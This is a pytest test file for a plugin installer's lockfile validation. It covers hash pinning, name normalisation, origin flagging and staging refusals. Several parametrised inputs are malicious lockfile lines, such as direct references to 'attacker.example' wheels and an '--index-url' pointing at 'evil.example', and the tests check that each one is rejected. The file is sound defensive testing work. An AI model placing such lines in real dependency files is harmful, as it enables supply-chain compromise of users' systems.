"""Plugin lockfile parsing and the install preview's dependency origins
(design §7.4, §3.2 step 7 — PLG-2, PLG-5 lockfile rider).

DB-free on purpose: every check here runs without Postgres so it can never
hide behind ``requires_db``. The pip subprocess is faked where a report
shape is needed.
"""

from __future__ import annotations

import json
import subprocess
from pathlib import Path
from types import SimpleNamespace

import pytest

from domovoi.plugins_runtime import installer
from domovoi.plugins_runtime.installer import (
    InstallError,
    _install_error_response,
    index_file_origins,
    origin_of,
    pip_dry_run,
    validate_lockfile,
)
from domovoi.plugins_runtime.lockfile import (
    LockfileError,
    normalize_name,
    parse_lockfile,
)
from domovoi.plugins_runtime.manifest import parse_manifest, validate_plugin_dir

H1 = "--hash=sha256:" + "0" * 64
H2 = "--hash=sha256:" + "1" * 64

CLEAN = f"""\
#
# This file is autogenerated by pip-compile with Python 3.12
#
certifi==2024.2.2 \\
    {H1} \\
    {H2}
idna==3.6 \\
    {H1}
requests[socks]==2.32.3 ; python_version >= "3.8" \\
    {H1}
Charset_Normalizer==3.3.2 {H1} {H2}
"""


# ─── parsing ──────────────────────────────────────────────────────────────


def test_parse_accepts_pip_compile_output() -> None:
    reqs = parse_lockfile(CLEAN)
    assert [r.spec for r in reqs] == [
        "certifi==2024.2.2", "idna==3.6", "requests[socks]==2.32.3",
        "Charset_Normalizer==3.3.2",
    ]
    by_key = {r.key: r for r in reqs}
    assert by_key["certifi"].hashes == ("sha256:" + "0" * 64, "sha256:" + "1" * 64)
    assert by_key["requests"].extras == ("socks",)
    assert by_key["requests"].marker == 'python_version >= "3.8"'
    assert by_key["charset-normalizer"].name == "Charset_Normalizer"
    assert by_key["charset-normalizer"].hashes == (
        "sha256:" + "0" * 64, "sha256:" + "1" * 64,
    )
    assert by_key["certifi"].lineno == 4


def test_normalize_name_follows_pep503() -> None:
    assert normalize_name("Foo_Bar.baz") == "foo-bar-baz"
    assert normalize_name("charset--normalizer") == "charset-normalizer"


@pytest.mark.parametrize(
    "line",
    [
        f"evilpkg @ https://attacker.example/x.whl {H1}",
        f"evilpkg @ file:///srv/x.whl {H1}",
        f"evilpkg@https://attacker.example/x.whl {H1}",
        f"https://attacker.example/x.whl {H1}",
        f"git+https://github.com/x/y@main#egg=evilpkg {H1}",
        f"evilpkg==0.0.0 @ https://attacker.example/x.whl {H1}",
    ],
)
def test_parse_rejects_direct_references(line: str) -> None:
    with pytest.raises(LockfileError) as exc:
        parse_lockfile(f"{line}\n")
    assert exc.value.code == "lockfile_requirement"
    assert "direct references" in str(exc.value)
    assert exc.value.details["line"] == 1


@pytest.mark.parametrize(
    "line",
    [
        f"./vendor/x.whl {H1}",
        f"../x.whl {H1}",
        f"/srv/wheels/x.whl {H1}",
        f"vendor/x-1.0-py3-none-any.whl {H1}",
        f"C:\\wheels\\x.whl {H1}",
        f"x.whl {H1}",
        f"~/x.tar.gz {H1}",
    ],
)
def test_parse_rejects_local_paths(line: str) -> None:
    with pytest.raises(LockfileError) as exc:
        parse_lockfile(f"{line}\n")
    assert exc.value.code == "lockfile_requirement"
    assert "local paths" in str(exc.value)


@pytest.mark.parametrize(
    "line",
    [
        f"foo>=1.0 {H1}",
        f"foo {H1}",
        f"foo==1.0,<2 {H1}",
        f"foo===1.0 {H1}",
        f"foo==1.0 bar==2.0 {H1}",
    ],
)
def test_parse_rejects_anything_but_an_exact_pin(line: str) -> None:
    with pytest.raises(LockfileError) as exc:
        parse_lockfile(f"{line}\n")
    assert exc.value.code == "lockfile_requirement"


@pytest.mark.parametrize(
    "line",
    [
        "--no-binary :all:",
        "--index-url https://evil.example/simple",
        "--find-links ./wheelhouse",
        "-e .",
        f"foo==1.0 --no-binary :all: {H1}",
        f"foo==1.0 {H1} --pre",
    ],
)
def test_parse_rejects_global_options_wherever_they_sit(line: str) -> None:
    with pytest.raises(LockfileError) as exc:
        parse_lockfile(f"{line}\n")
    assert exc.value.code == "lockfile_option"


def test_parse_rejects_weak_or_malformed_hashes() -> None:
    with pytest.raises(LockfileError, match="sha256"):
        parse_lockfile("foo==1.0 --hash=md5:d41d8cd98f00b204e9800998ecf8427e\n")
    with pytest.raises(LockfileError, match="sha256"):
        parse_lockfile("foo==1.0 --hash=sha256:not-hex\n")


def test_parse_ignores_comments_and_blank_lines() -> None:
    text = (
        "# foo @ https://commented.example/x.whl\n"
        "\n"
        f"foo==1.0  # trailing comment with ://\n"
        f"    {H1}\n"
    )
    (req,) = parse_lockfile(text)
    assert req.spec == "foo==1.0"
    assert req.hashes == ("sha256:" + "0" * 64,)


# ─── the installer's validation (→ 422) ───────────────────────────────────


@pytest.mark.parametrize(
    "line",
    [
        f"evilpkg @ https://attacker.example/x.whl {H1}",
        f"evilpkg @ file:///srv/x.whl {H1}",
        f"./vendor/x.whl {H1}",
        "--find-links ./wheelhouse",
    ],
)
def test_validate_lockfile_returns_422_for_urls_paths_and_options(
    tmp_path: Path, line: str
) -> None:
    lock = tmp_path / "requirements.lock"
    lock.write_text(f"{line}\n" f"certifi==2024.2.2 {H1}\n", encoding="utf-8")
    with pytest.raises(InstallError) as exc:
        validate_lockfile(lock)
    assert exc.value.code in ("lockfile_requirement", "lockfile_option")
    http = _install_error_response(exc.value)
    assert http.status_code == 422
    assert http.detail["error"]["code"] == exc.value.code
    assert http.detail["error"]["details"]["line"] == 1


def test_validate_lockfile_returns_the_parsed_pins(tmp_path: Path) -> None:
    lock = tmp_path / "requirements.lock"
    lock.write_text(CLEAN, encoding="utf-8")
    reqs = validate_lockfile(lock)
    assert [r.key for r in reqs] == ["certifi", "idna", "requests", "charset-normalizer"]


# ─── manifest layout check parses, never substring-matches ───────────────

MANIFEST = """
[plugin]
slug = "lockdemo"
name = "Lock Demo"
version = "1.0.0"
publisher = "Coders Farm"
license = "MIT"
description = "lockfile demo"
domovoi_api = ">=1.0,<2.0"

[entry_points]
core = "domovoi_plugin_lockdemo.core"

[[handlers]]
name = "lockdemo"
band = 400
label = "Lock Demo"
tone = "info"

[requirements]
python = ["{req}"]
lockfile = "requirements.lock"
"""


def _plugin_dir(tmp_path: Path, requirement: str, lock_text: str) -> tuple[Path, object]:
    root = tmp_path / "plugin"
    pkg = root / "domovoi_plugin_lockdemo"
    pkg.mkdir(parents=True)
    (pkg / "__init__.py").write_text("", encoding="utf-8")
    (pkg / "core.py").write_text("def register(ctx):\n    pass\n", encoding="utf-8")
    (root / "requirements.lock").write_text(lock_text, encoding="utf-8")
    manifest = parse_manifest(MANIFEST.replace("{req}", requirement))
    return root, manifest


def test_direct_dep_check_is_parsed_not_substring_matched(tmp_path: Path) -> None:
    # 'xfoo==1.0' CONTAINS 'foo==1.0' — a substring match would accept it.
    root, manifest = _plugin_dir(tmp_path, "foo==1.0", f"xfoo==1.0 {H1}\n")
    errors = validate_plugin_dir(root, manifest)
    assert any("direct requirement 'foo==1.0' not found" in e for e in errors), errors


def test_direct_dep_check_normalizes_names(tmp_path: Path) -> None:
    root, manifest = _plugin_dir(
        tmp_path, "Charset_Normalizer==3.3.2", f"charset-normalizer==3.3.2 {H1}\n"
    )
    assert validate_plugin_dir(root, manifest) == []


def test_direct_dep_check_reports_an_unparseable_lockfile(tmp_path: Path) -> None:
    root, manifest = _plugin_dir(
        tmp_path, "foo==1.0", f"foo @ https://attacker.example/x.whl {H1}\n"
    )
    errors = validate_plugin_dir(root, manifest)
    assert any("direct references" in e for e in errors), errors


# ─── origins on the preview ───────────────────────────────────────────────


def test_index_file_origins_default_pypi(monkeypatch) -> None:
    monkeypatch.delenv("PIP_INDEX_URL", raising=False)
    monkeypatch.delenv("DOMOVOI_PIP_FILE_ORIGINS", raising=False)
    assert index_file_origins() == {"https://pypi.org", "https://files.pythonhosted.org"}


def test_index_file_origins_private_index_and_operator_extras(monkeypatch) -> None:
    monkeypatch.setenv("PIP_INDEX_URL", "https://mirror.lan:8443/simple/")
    monkeypatch.setenv("DOMOVOI_PIP_FILE_ORIGINS", "https://cdn.lan, https://Files.LAN:9000/x")
    assert index_file_origins() == {
        "https://mirror.lan:8443", "https://cdn.lan", "https://files.lan:9000",
    }


def test_origin_of() -> None:
    assert origin_of("https://files.pythonhosted.org/packages/a/b/c.whl") == (
        "https://files.pythonhosted.org"
    )
    assert origin_of(None) is None


def _fake_pip(monkeypatch, report: dict) -> None:
    def _run(args, **kwargs):
        assert "--dry-run" in args
        return SimpleNamespace(returncode=0, stdout=json.dumps(report), stderr="")

    monkeypatch.setattr(subprocess, "run", _run)


def test_preview_shows_each_requirement_origin_and_flags_off_index(
    tmp_path: Path, monkeypatch
) -> None:
    monkeypatch.delenv("PIP_INDEX_URL", raising=False)
    monkeypatch.delenv("DOMOVOI_PIP_FILE_ORIGINS", raising=False)
    lock = tmp_path / "requirements.lock"
    lock.write_text(f"certifi==2024.2.2 {H1}\nidna==3.6 {H1}\n", encoding="utf-8")
    _fake_pip(monkeypatch, {
        "install": [
            {
                "metadata": {"name": "zz-never-installed-a", "version": "2024.2.2"},
                "download_info": {
                    "url": "https://files.pythonhosted.org/packages/x/certifi.whl",
                    "archive_info": {"hashes": {"sha256": "0" * 64}},
                },
            },
            {
                "metadata": {"name": "zz-never-installed-b", "version": "3.6"},
                "download_info": {
                    "url": "https://mirror.example/packages/idna.whl",
                    "archive_info": {"hashes": {"sha256": "1" * 64}},
                },
            },
        ]
    })
    resolved = pip_dry_run(lock)["resolved"]
    assert resolved[0]["origin"] == "https://files.pythonhosted.org"
    assert resolved[0]["origin_ok"] is True
    assert resolved[1]["origin"] == "https://mirror.example"
    assert resolved[1]["origin_ok"] is False


def _dist(name: str, version: str) -> dict:
    return {
        "metadata": {"name": name, "version": version},
        "download_info": {
            "url": f"https://files.pythonhosted.org/packages/x/{name}.whl",
            "archive_info": {"hashes": {"sha256": "0" * 64}},
        },
    }


def test_dry_run_refuses_a_lock_that_would_change_an_installed_dist(
    tmp_path: Path, monkeypatch
) -> None:
    """A plugin pin that differs from the version already installed in the
    core's environment (a plugin numpy behind the core lock's) is refused
    before the trust screen; a dist new to the environment is not."""
    from importlib import metadata

    installed = metadata.version("pytest")
    lock = tmp_path / "requirements.lock"
    lock.write_text(f"pytest==0.0.1 {H1}\nzz-never-installed==1.0 {H1}\n", encoding="utf-8")
    _fake_pip(monkeypatch, {
        "install": [_dist("pytest", "0.0.1"), _dist("zz-never-installed", "1.0")]
    })
    with pytest.raises(InstallError) as exc:
        pip_dry_run(lock)
    assert exc.value.code == "requirements_conflict"
    assert exc.value.details["conflicts"] == [{
        "package": "pytest", "installed": installed, "requested": "0.0.1",
        "required_by": "requirements.lock",
    }]

    lock.write_text(f"zz-never-installed==1.0 {H1}\n", encoding="utf-8")
    _fake_pip(monkeypatch, {"install": [_dist("zz-never-installed", "1.0")]})
    assert [d["name"] for d in pip_dry_run(lock)["resolved"]] == ["zz-never-installed"]


FIXTURE = Path(__file__).parent / "fixtures" / "compliments"
LC08_OPTION_ZIP = Path(
    "C:/Users/Kamron/claude-exp/domovoi-project/functional-testing/"
    "plugin-fixtures/lc08/lc08-lockfile_option.zip"
)


def _compliments_zip_with_lockfile(lock_text: str, requirement: str = "evilpkg==0.0.0") -> bytes:
    import io
    import zipfile

    manifest = (FIXTURE / "domovoi-plugin.toml").read_text(encoding="utf-8") + (
        f'\n[requirements]\npython = ["{requirement}"]\n'
        'lockfile = "requirements.lock"\n'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for f in sorted(FIXTURE.rglob("*")):
            if f.is_dir() or "__pycache__" in f.parts:
                continue
            rel = f.relative_to(FIXTURE).as_posix()
            zf.writestr(rel, manifest if rel == "domovoi-plugin.toml" else f.read_bytes())
        zf.writestr("requirements.lock", lock_text)
    return buf.getvalue()


@pytest.fixture
def staging(tmp_path: Path, monkeypatch):
    """stage_zip refuses a bad lockfile before it touches the registry, so
    these run without Postgres — only the staging dir needs sandboxing."""
    root = tmp_path / "staging"
    root.mkdir()
    monkeypatch.setattr(installer, "staging_root", lambda: root)

    def _boom(*a, **kw):  # pragma: no cover — the assertion
        raise AssertionError("pip was invoked")

    monkeypatch.setattr(subprocess, "run", _boom)
    yield root
    installer._STAGED.clear()


@pytest.mark.asyncio
async def test_stage_refuses_direct_url_lockfile_with_422_code(staging) -> None:
    with pytest.raises(InstallError) as exc:
        await installer.stage_zip(
            _compliments_zip_with_lockfile(
                f"evilpkg @ https://attacker.example/x.whl {H1}\n"
            )
        )
    assert exc.value.code == "lockfile_requirement"
    assert _install_error_response(exc.value).status_code == 422
    assert list(staging.iterdir()) == []      # nothing left staged


@pytest.mark.asyncio
async def test_stage_refuses_local_path_lockfile(staging) -> None:
    with pytest.raises(InstallError) as exc:
        await installer.stage_zip(
            _compliments_zip_with_lockfile(f"./vendor/evilpkg.whl {H1}\n")
        )
    assert exc.value.code == "lockfile_requirement"
    assert "local paths" in str(exc.value)


@pytest.mark.asyncio
async def test_stage_keeps_the_precise_option_code(staging) -> None:
    """A smuggled global option still reports lockfile_option (the LC-08
    fixture's contract), not a generic layout error."""
    with pytest.raises(InstallError) as exc:
        await installer.stage_zip(
            _compliments_zip_with_lockfile(
                f"--no-binary :all:\nevilpkg==0.0.0 {H1}\n"
            )
        )
    assert exc.value.code == "lockfile_option"
    assert exc.value.details == {"line": 1, "option": "--no-binary"}


@pytest.mark.asyncio
@pytest.mark.skipif(not LC08_OPTION_ZIP.is_file(), reason="LC-08 fixture zip not on this box")
async def test_stage_lc08_lockfile_option_fixture(staging) -> None:
    with pytest.raises(InstallError) as exc:
        await installer.stage_zip(LC08_OPTION_ZIP.read_bytes())
    assert exc.value.code == "lockfile_option"
    assert exc.value.details == {"line": 2, "option": "--no-binary"}


@pytest.mark.asyncio
async def test_stage_direct_dep_must_be_pinned_by_a_parsed_line(staging) -> None:
    with pytest.raises(InstallError) as exc:
        await installer.stage_zip(
            _compliments_zip_with_lockfile(f"xevilpkg==0.0.0 {H1}\n")
        )
    assert exc.value.code == "layout_invalid"
    assert "direct requirement 'evilpkg==0.0.0' not found" in str(exc.value)


def test_dry_run_never_runs_pip_on_a_direct_url_lockfile(
    tmp_path: Path, monkeypatch
) -> None:
    lock = tmp_path / "requirements.lock"
    lock.write_text(f"evilpkg @ https://attacker.example/x.whl {H1}\n", encoding="utf-8")

    def _boom(*a, **kw):  # pragma: no cover — the assertion
        raise AssertionError("pip was invoked")

    monkeypatch.setattr(subprocess, "run", _boom)
    with pytest.raises(InstallError) as exc:
        pip_dry_run(lock)
    assert exc.value.code == "lockfile_requirement"
    assert installer._pip_run_env  # module still importable / intact
